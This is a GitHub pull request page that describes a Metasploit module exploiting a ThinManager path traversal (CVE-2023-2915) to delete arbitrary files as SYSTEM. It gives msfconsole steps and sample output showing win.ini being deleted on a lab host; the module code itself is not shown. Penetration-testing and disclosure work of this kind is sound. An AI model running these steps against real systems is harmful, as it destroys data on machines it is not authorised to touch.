Skip to content

ThinManager Path Traversal Delete (CVE-2023-2915) Module #20140

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 4 commits into
base: master
Choose a base branch
from

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented May 7, 2025

This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2915) to delete an arbitrary file from the target system.

The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.

Verification Steps

  1. The software can be obtained from the vendor. Install it with default settings.
  2. Start msfconsole
  3. msf6 > use auxiliary/gather/thinmanager_traversal_delete
  4. msf6 auxiliary(gather/thinmanager_traversal_delete) > set RHOSTS <IP>
  5. msf6 auxiliary(gather/thinmanager_traversal_delete) > set FILE <file to delete>
  6. msf6 auxiliary(gather/thinmanager_traversal_delete) > run

Example output:

msf6 auxiliary(gather/thinmanager_traversal_delete) > run
[*] Running module against 192.168.137.229

[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.137.229:2031 - The service is running, but could not be validated.
[*] 192.168.137.229:2031 - Sending handshake...
[*] 192.168.137.229:2031 - Received handshake response.
[*] 192.168.137.229:2031 - Deleting /Windows/win.ini from 192.168.137.229
[+] 192.168.137.229:2031 - Received response from target.
[*] Auxiliary module execution completed

Successfully tested on

  • ThinManager v13.1.0 on Windows 22H2
  • ThinManager v13.0.1 on Windows 22H2
  • ThinManager v13.0.0 on Windows 22H2
  • ThinManager v12.1.5 on Windows 22H2
  • ThinManager v10.0.2 on Windows 22H2

@h4x-x0r h4x-x0r marked this pull request as ready for review May 7, 2025 17:06
@bwatters-r7 bwatters-r7 self-assigned this May 8, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants